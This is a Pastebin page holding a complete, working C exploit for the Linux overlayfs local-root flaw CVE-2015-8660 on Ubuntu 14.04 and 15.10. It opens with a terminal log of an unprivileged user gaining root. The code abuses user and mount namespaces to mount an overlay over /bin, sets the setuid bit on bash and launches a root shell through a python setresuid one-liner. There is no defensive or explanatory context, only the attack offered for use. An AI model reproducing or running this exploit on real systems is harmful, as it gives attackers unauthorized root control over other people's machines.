API tools faq
paste
Advertisement
Guest User

exploit

a guest
Feb 7th, 2016
94
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.63 KB | None | 0 0
raw download clone embed print report
  1. # Exploit Title: overlayfs local root
  2. # Date: 2016-01-05
  3. # Version: Ubuntu 14.04 LTS, 15.10 and more
  4. # Tested on: Ubuntu 14.04 LTS, 15.10
  5. # CVE : CVE-2015-8660
  6.  
  7. blah@ubuntu:~$ id
  8. uid=1001(blah) gid=1001(blah) groups=1001(blah)
  9. blah@ubuntu:~$ uname -a && cat /etc/issue
  10. Linux ubuntu 3.19.0-42-generic #48~14.04.1-Ubuntu SMP Fri Dec 18 10:24:49 UTC 2015 x86_64 x86_64 x86_64 GNU/Linux
  11. Ubuntu 14.04.3 LTS \n \l
  12. blah@ubuntu:~$ ./overlayfail
  13. root@ubuntu:~# id
  14. uid=0(root) gid=1001(blah) groups=0(root),1001(blah)
  15.  
  16. 12/2015
  17. by rebel
  18.  
  19. 6354b4e23db225b565d79f226f2e49ec0fe1e19b
  20. */
  21.  
  22. #include <stdio.h>
  23. #include <sched.h>
  24. #include <stdlib.h>
  25. #include <unistd.h>
  26. #include <sched.h>
  27. #include <sys/stat.h>
  28. #include <sys/types.h>
  29. #include <sys/mount.h>
  30. #include <stdio.h>
  31. #include <stdlib.h>
  32. #include <unistd.h>
  33. #include <sched.h>
  34. #include <sys/stat.h>
  35. #include <sys/types.h>
  36. #include <sys/mount.h>
  37. #include <sys/types.h>
  38. #include <signal.h>
  39. #include <fcntl.h>
  40. #include <string.h>
  41. #include <linux/sched.h>
  42. #include <sys/wait.h>
  43.  
  44. static char child_stack[1024*1024];
  45.  
  46. static int
  47. child_exec(void *stuff)
  48. {
  49. system("rm -rf /tmp/haxhax");
  50. mkdir("/tmp/haxhax", 0777);
  51. mkdir("/tmp/haxhax/w", 0777);
  52. mkdir("/tmp/haxhax/u",0777);
  53. mkdir("/tmp/haxhax/o",0777);
  54.  
  55. if (mount("overlay", "/tmp/haxhax/o", "overlay", MS_MGC_VAL, "lowerdir=/bin,upperdir=/tmp/haxhax/u,workdir=/tmp/haxhax/w") != 0) {
  56. fprintf(stderr,"mount failed..\n");
  57. }
  58.  
  59. chmod("/tmp/haxhax/w/work",0777);
  60. chdir("/tmp/haxhax/o");
  61. chmod("bash",04755);
  62. chdir("/");
  63. umount("/tmp/haxhax/o");
  64. return 0;
  65. }
  66.  
  67. int
  68. main(int argc, char **argv)
  69. {
  70. int status;
  71. pid_t wrapper, init;
  72. int clone_flags = CLONE_NEWNS | SIGCHLD;
  73. struct stat s;
  74.  
  75. if((wrapper = fork()) == 0) {
  76. if(unshare(CLONE_NEWUSER) != 0)
  77. fprintf(stderr, "failed to create new user namespace\n");
  78.  
  79. if((init = fork()) == 0) {
  80. pid_t pid =
  81. clone(child_exec, child_stack + (1024*1024), clone_flags, NULL);
  82. if(pid < 0) {
  83. fprintf(stderr, "failed to create new mount namespace\n");
  84. exit(-1);
  85. }
  86.  
  87. waitpid(pid, &status, 0);
  88.  
  89. }
  90.  
  91. waitpid(init, &status, 0);
  92. return 0;
  93. }
  94.  
  95. usleep(300000);
  96.  
  97. wait(NULL);
  98.  
  99. stat("/tmp/haxhax/u/bash",&s);
  100.  
  101. if(s.st_mode == 0x89ed)
  102. execl("/tmp/haxhax/u/bash","bash","-p","-c","rm -rf /tmp/haxhax;python -c \"import os;os.setresuid(0,0,0);os.execl('/bin/bash','bash');\"",NULL);
  103.  
  104. fprintf(stderr,"couldn't create suid :(\n");
  105. return -1;
  106. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!